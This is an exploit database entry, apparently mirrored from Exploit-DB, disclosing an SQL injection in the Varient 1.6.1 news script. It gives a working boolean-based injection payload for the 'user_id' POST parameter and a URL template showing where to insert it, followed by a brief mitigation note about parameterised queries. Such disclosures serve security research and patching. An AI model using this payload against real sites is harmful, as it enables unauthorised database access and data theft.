Varient 1.6.1 SQL Inj.

vendor:

Varient

by:

Mehmet EMIROGLU

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Varient

Affected Version From: 1.6.1

Affected Version To: 1.6.1

Patch Exists: NO

Related CWE: N/A

CPE: a:codingest:varient

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Wamp64, Windows

2019

Varient 1.6.1 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the 'user_id' parameter in the POST request. The attack pattern is '%27)/**/oR/**/3211170=3211170/**/aNd/**/(%276199%27)=(%276199'

Mitigation:

Input validation should be used to prevent SQL Injection attacks. Sanitize all user input and use parameterized queries.

Source

Exploit-DB raw data:

===========================================================================================
# Exploit Title: Varient 1.6.1 SQL Inj.
# Dork: N/A
# Date: 29-06-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://varient.codingest.com/
# Software Link: https://varient.codingest.com/
# Version: v1.6.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: the best news and magazine script
===========================================================================================
# POC - SQLi
# Parameters : user_id
# Attack Pattern :
%27)/**/oR/**/3211170=3211170/**/aNd/**/(%276199%27)=(%276199
# POST Method :
https://site.com/unpleasant-nor-diminution-excellence-apartments-imprudence?parent_id=0&post_id=66&name=9956574&comment=[COMMENT
HERE]7146048&user_id=99999999[SQL INJECT HERE]
===========================================================================================